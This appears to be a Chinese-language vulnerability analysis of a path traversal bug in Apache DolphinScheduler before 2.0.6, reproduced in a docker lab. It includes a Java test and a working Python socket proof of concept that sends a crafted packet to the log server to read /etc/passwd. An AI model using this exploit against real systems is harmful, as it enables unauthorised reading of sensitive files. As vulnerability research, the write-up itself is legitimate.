漏洞简介
Apache DolphinScheduler是美国阿帕奇(Apache)基金会的一个分布式的基于DAG可视化的工作流任务调度系统。
Apache DolphinScheduler 2.0.6之前版本存在路径遍历漏洞,该漏洞源于用户可以通过日志服务器读取任何文件。
data:image/s3,"s3://crabby-images/f903e/f903eb4bba4b59bca6b64b0943a615a0e71aa59f" alt=""
data:image/s3,"s3://crabby-images/9f3bd/9f3bd000473e0773e323efbd02ea96c03f958c10" alt=""
环境搭建
还是利用 docker 来进行环境的搭建操作
https://dolphinscheduler.apache.org/en-us/docs/2.0.5/guide/installation/docker
data:image/s3,"s3://crabby-images/2f5b0/2f5b05d04eb63d269bebf680a29cab4d516203b2" alt=""
修改一下 docker-compose.yml 文件 使得 50051 端口也映射出来
data:image/s3,"s3://crabby-images/daeee/daeee5044aef3386a39737e827513625e517f885" alt=""
我们看到其中数据库连接的字符串可控
data:image/s3,"s3://crabby-images/2c163/2c163e7cdff7a2295a0216a0ca49f21d325bb03e" alt=""
<mysql.connector.version>8.0.16</mysql.connector.version>
<postgresql.version>42.2.5</postgresql.version> 恰好不在pgjdbc漏洞范围内
漏洞分析
data:image/s3,"s3://crabby-images/07e86/07e86e7255cca1dc38c9e1d06443d55c9519f46d" alt=""
https://github.com/apache/dolphinscheduler/commit/adc223465b5b83a9446dfc809ae98cf4bbfaadce
data:image/s3,"s3://crabby-images/5b415/5b415b290193901e6cc85792200a746edb0dd3f3" alt=""
data:image/s3,"s3://crabby-images/19911/199116fc684d42969238b627452a2a3b2810f4be" alt=""
通过对比查看修复代码 我们可以定位到漏洞可能存在的位置
org.apache.dolphinscheduler.server.log.LoggerRequestProcessor#process
data:image/s3,"s3://crabby-images/851c1/851c12beac0b4a05d12836cfb4f5e96603333231" alt=""
根据传入的 command 的 type 对应不同的操作
org.apache.dolphinscheduler.common.utils.LoggerUtils#readWholeFileContent
data:image/s3,"s3://crabby-images/f0c23/f0c23a767a0e6a25962152be4157d4a8599f47b1" alt=""
所以目前的问题就是要想办法触发 LoggerRequestProcessor.process
data:image/s3,"s3://crabby-images/8d2ba/8d2ba05d6bdf0251534288effdc4a35a2068d6bf" alt=""
org.apache.dolphinscheduler.remote.processor.NettyRequestProcessor
data:image/s3,"s3://crabby-images/fd8d2/fd8d29b233f2e592c125a9fd0527c62478905920" alt=""
data:image/s3,"s3://crabby-images/606d9/606d922c9ba32a04a19b37d5bda5f41f4795150e" alt=""
public void testRollViewLog() throws IOException {
logClientService = new LogClientService();
String resultTmpDemoString = logClientService.rollViewLog(
"192.168.184.1", Constants.RPC_PORT,"/tmp/../../../../../etc/passwd", 0, 1000);
System.out.println(resultTmpDemoString);
}
data:image/s3,"s3://crabby-images/1384c/1384ccdd1038de3328fd90f74954539912e61158" alt=""
org/apache/dolphinscheduler/service/log/LogClientService.java
日志文件的客户端方法
data:image/s3,"s3://crabby-images/490bb/490bb9e99319dbe0416417ff31f73a6bc9c4eb20" alt=""
data:image/s3,"s3://crabby-images/83a6d/83a6d4614b043e0e652f8027e16bfb09928d8907" alt=""
data:image/s3,"s3://crabby-images/1a806/1a806962d2a314d1b2d581297677f9220420741e" alt=""
构造 python 方法实现
import socket
import binascii
client = socket.socket()
client.connect(('192.168.184.1',50051))
path_data = '''{"path":"/tmp/../../../../../etc/passwd"}'''
path_data_hex=path_data.encode().hex()
data = '''be000400000000000000010000000c7b226974656d73223a7b7d7d00000029'''+path_data_hex
client.send(binascii.a2b_hex(data))
data_recv = client.recv(1024)
reaponse=binascii.b2a_hex(data_recv).decode("utf-8")
reaponse_data = bytes.fromhex(reaponse).decode('utf-8','ignore')
print(reaponse_data)
data:image/s3,"s3://crabby-images/52843/528432f61dc6134fbbfcc2959402fea0a21876e1" alt=""
后台任意命令执行
data:image/s3,"s3://crabby-images/e6fde/e6fde0905be5ae44410248b87e7ea9779f78c81c" alt=""
data:image/s3,"s3://crabby-images/29700/29700e6cabda77afc2c369c1aa28824713c35a0c" alt=""
data:image/s3,"s3://crabby-images/ea4e1/ea4e1878aa6601b4eb96cbd387f32808105be58c" alt=""
data:image/s3,"s3://crabby-images/50235/50235c7fd49eebd59fcfd901f88e2d28650a08be" alt=""
data:image/s3,"s3://crabby-images/62b0a/62b0a6abb8470450a328c1366b7d95160f666359" alt=""